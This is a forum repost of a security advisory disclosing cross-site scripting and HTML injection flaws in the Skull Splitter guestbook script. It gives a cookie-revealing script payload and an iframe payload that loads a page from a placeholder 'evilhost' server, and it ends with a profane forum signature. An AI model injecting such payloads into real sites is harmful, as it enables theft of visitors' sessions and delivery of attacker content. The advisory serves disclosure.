发新话题
打印

[转载]Skull Splitter留言本多个跨站脚本及HTML injection漏洞

[转载]Skull Splitter留言本多个跨站脚本及HTML injection漏洞

文章作者:Morinex Eneco <morinex[at]marocmafia com>

-Tested
Localhost , skull-splitter.net.

>Target : Skull-Splitter&#39;s Guestbook
>Vulnerable Versions: Guestbook 1.0, 2.0 & 2.2
>URL : hhttp://www.skull-splitter.net/ - http://www.skull-splitter.net/misc/guestbook/

-Description

With this guestbook script your visitors have the possibility to drop you
a comment on your website, greet you, say hi or whatever simply by filling
out a short form. All the guestbook entries will be displayed on the guestbook-page.
You can specify how many entries you want to be displayed per page. If you have more
entries than that number, the oldest guestbook entries get moved to the next page.
In the admin area you can easily comment on, edit and delete guestbook entries.
You don&#39;t need any knowledge of any programming or database languages to use this
script.
If you want to adjust the appereance of the pages though, you need to have a basic
knowledge
of the markup language HTML. If you like you could even use a HTML editor to do so.
Requires:
- PHP supporting webspace - a MySQL database (1 table).



-Cross site scripting aka XXS examples/PoC丩S


1. Type in the title or content of msg

<script>alert(document.cookie)</script>


- HTML injection

Type in the title or content of msg

2. <iframe src=http://evilhost/evil.php>


-Fix

Waiting for a patch of the vendor


-Original Advisory

http://www.m0r1n3x.com/Skull-splitter_adv.txt
曾几何时,有人对我说:装B遭雷劈。我说:去你妈的。于是,这个人又对我说:如果再说脏话,上帝会惩罚你的。我说:我操上帝。结论:彪悍的人生不需要上帝。

TOP

发新话题